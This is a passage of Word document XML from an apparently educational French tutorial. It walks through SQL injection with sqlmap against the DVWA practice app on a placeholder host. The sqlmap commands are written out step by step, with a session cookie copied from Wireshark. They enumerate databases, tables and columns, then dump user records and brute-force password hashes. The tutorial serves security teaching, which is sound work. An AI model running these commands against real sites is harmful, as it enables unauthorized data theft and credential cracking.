      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Uti</w:t>
      </w:r>
      <w:r w:rsidR="00716D02">
        <w:t>liser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> le filtre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>http.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00383FBC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dans </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour récupérer le paquet qui nous intéresse.</w:t>
      </w:r>
      <w:r w:rsidR="00716D02">
        <w:t xml:space="preserve"> Ensuite cliquer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> droit sur la ligne c</w:t>
      </w:r>
      <w:r w:rsidR="00716D02">
        <w:t>ontenant le cookie, choisir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Copy</w:t>
      </w:r>
      <w:r w:rsidR="00716D02">
        <w:t xml:space="preserve"> et cliquer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sur </w:t>
      </w:r>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> afin de copier la valeur du cookie dans le presse-papier. Dans notre exemple le cookie a la valeur : </w:t>
      </w:r>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>low</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>; PHPSESSID=b0fa6e8a78826ec5969021e5aa7641f7"</w:t>
      </w:r>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00817F79">
        <w:br/>
      </w:r>
      <w:r w:rsidR="001F79BB">
        <w:t>Taper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ensuite la commande : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -u "www.victim.tld/dvwa/vulnerabilities/sqli/?id=a&amp;Submit=Submit" --cookie="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>low</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B44AB">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>; PHPSESSID=b0fa6e8a78826ec5969021e5aa7641f7"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C5A3B5" w14:textId="77777777" w:rsidR="00A62A32" w:rsidRDefault="00A62A32" w:rsidP="00552EC6">
      <w:pPr>
        <w:keepLines/>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:before="240"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60BA388D" wp14:editId="6F5FC345">
            <wp:extent cx="5451786" cy="3788968"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="3" name="Image 1" descr="01Coo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Cook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12" cy="378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1F22" w14:textId="77777777" w:rsidR="00552EC6" w:rsidRDefault="00552EC6" w:rsidP="00552EC6">
      <w:pPr>
        <w:keepLines/>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:before="240"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E60612" w14:textId="38E74505" w:rsidR="005A1DF7" w:rsidRDefault="00A62A32" w:rsidP="003B44AB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:ind w:left="426"/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 wp14:anchorId="5F98A7C2" wp14:editId="6C612BE1">
            <wp:extent cx="5447007" cy="3797654"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Image 3" descr="02Coo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Cook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07" cy="379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53A2B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DA45C8">
        <w:t>Dans le cas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> d’une application ne demandant pas une authentification, la commande à taper </w:t>
      </w:r>
      <w:r w:rsidR="00053A2B">
        <w:t xml:space="preserve">est </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A1DF7">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A1DF7">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:r w:rsidR="005A1DF7" w:rsidRPr="005A1DF7">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>www.victim.tld/dvwa/vulnerabilities/sqli/?id=a&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71554751" w14:textId="77777777" w:rsidR="003B44AB" w:rsidRDefault="005A1DF7" w:rsidP="00552EC6">
      <w:pPr>
        <w:keepLines/>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:before="240"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44DBAB29" wp14:editId="63338A73">
            <wp:extent cx="5447007" cy="4048603"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Image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79" cy="404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4A1F" w14:textId="77777777" w:rsidR="003B44AB" w:rsidRDefault="003B44AB" w:rsidP="003B44AB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3235E055" w14:textId="6F9DDAFF" w:rsidR="00A62A32" w:rsidRDefault="00A62A32" w:rsidP="003B44AB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="003D4528">
        <w:t>Nous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pouvons constater que l’URL est bien détectée comme vulnérable par </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et que la DBMS est MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B61465" w14:textId="77777777" w:rsidR="00DC3182" w:rsidRDefault="00DC3182" w:rsidP="003B44AB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:ind w:left="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57EBDC7E" w14:textId="443FDDBC" w:rsidR="00A62A32" w:rsidRPr="006C3E4D" w:rsidRDefault="002B0A24" w:rsidP="00DC3182">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:before="240"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Nous</w:t>
      </w:r>
      <w:r w:rsidR="00A62A32">
        <w:t xml:space="preserve"> allons récupérer toutes les bases de données hébergées par le serveur.</w:t>
      </w:r>
      <w:r w:rsidR="00A62A32">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A62A32" w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A62A32" w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -u "www.victim.tld/dvwa/vulnerabilities/sqli/?id=a&amp;Submit=Submit" --cookie="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A62A32" w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A62A32" w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A62A32" w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>low</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A62A32" w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>; PHPSESSID=b0fa6e8a78826ec5969021e5aa7641f7" --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A62A32" w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>dbms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A62A32" w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A62A32" w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A62A32" w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A62A32" w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D97DDE1" w14:textId="5470D864" w:rsidR="006C3E4D" w:rsidRPr="00034DE7" w:rsidRDefault="006C3E4D" w:rsidP="00552EC6">
      <w:pPr>
        <w:keepLines/>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:before="240"/>
        <w:ind w:firstLine="432"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A8CE113" wp14:editId="4D608C68">
            <wp:extent cx="5435990" cy="1867600"/>
            <wp:effectExtent l="0" t="0" r="0" b="12065"/>
            <wp:docPr id="11" name="Image 1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77" cy="186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AFC8" w14:textId="018C3452" w:rsidR="00A62A32" w:rsidRPr="006C3E4D" w:rsidRDefault="00A62A32" w:rsidP="006C3E4D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:before="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Maintenant nous souhaitons connaitre les tables de la base </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA5C40">
        <w:t>. Pour cela exécuter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> la commande : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -u "www.victim.tld/dvwa/vulnerabilities/sqli/?id=a&amp;Submit=Submit" --cookie="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>low</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">; PHPSESSID=b0fa6e8a78826ec5969021e5aa7641f7" -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6183EEF4" w14:textId="2F3BC52B" w:rsidR="006C3E4D" w:rsidRDefault="006C3E4D" w:rsidP="00552EC6">
      <w:pPr>
        <w:keepLines/>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:before="240"/>
        <w:ind w:firstLine="432"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09524573" wp14:editId="211F7FE0">
            <wp:extent cx="5435990" cy="2033847"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Image 13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21" cy="203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559B" w14:textId="48EA59CD" w:rsidR="00A62A32" w:rsidRPr="006C3E4D" w:rsidRDefault="00A62A32" w:rsidP="006C3E4D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:before="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00477B3C">
        <w:t>Nous souhaitons</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ici connaitre les colonnes qui composent la table </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de la base </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00477B3C">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -u "www.victim.tld/dvwa/vulnerabilities/sqli/?id=a&amp;Submit=Submit" --cookie="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>low</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">; PHPSESSID=b0fa6e8a78826ec5969021e5aa7641f7" -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -T </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71D4D968" w14:textId="654A96B6" w:rsidR="006C3E4D" w:rsidRPr="006C3E4D" w:rsidRDefault="006C3E4D" w:rsidP="00552EC6">
      <w:pPr>
        <w:keepLines/>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:before="240"/>
        <w:ind w:firstLine="432"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21E0DE5C" wp14:editId="5FFEE9FB">
            <wp:extent cx="5445030" cy="2506881"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="15" name="Image 1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740" cy="250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2639" w14:textId="11D61C24" w:rsidR="00A62A32" w:rsidRPr="006C3E4D" w:rsidRDefault="00A62A32" w:rsidP="006C3E4D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:before="240"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007726AB">
        <w:lastRenderedPageBreak/>
        <w:t>Nous allons récupérer les 3 premiers enregistrements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> des colonnes </w:t>
      </w:r>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="007726AB">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>first_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007726AB">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007726AB">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007726AB">
        <w:t xml:space="preserve">et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A0609">
        <w:t>. De plus, vu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que la colonne </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> contient des mots de passe chiffrés, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> va essayer de les brute forcer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007726AB">
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007726AB">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -u "www.victim.tld/dvwa/vulnerabilities/sqli/?id=a&amp;Submit=Submit" --cookie="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>low</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">; PHPSESSID=b0fa6e8a78826ec5969021e5aa7641f7" -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -T </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>user,first_name,last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>password,user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> --dump --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 --stop 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EBCD96" w14:textId="6C1462D2" w:rsidR="002073E2" w:rsidRPr="007726AB" w:rsidRDefault="006C3E4D" w:rsidP="002073E2">
      <w:pPr>
        <w:keepLines/>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:before="240"/>
        <w:ind w:firstLine="432"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A6E70ED" wp14:editId="2D9A1305">
            <wp:extent cx="5435990" cy="3421867"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="17" name="Image 17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33" cy="342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3E2">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09202B9D" w14:textId="12B51BA6" w:rsidR="00A62A32" w:rsidRPr="004133B6" w:rsidRDefault="00A62A32" w:rsidP="006C3E4D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
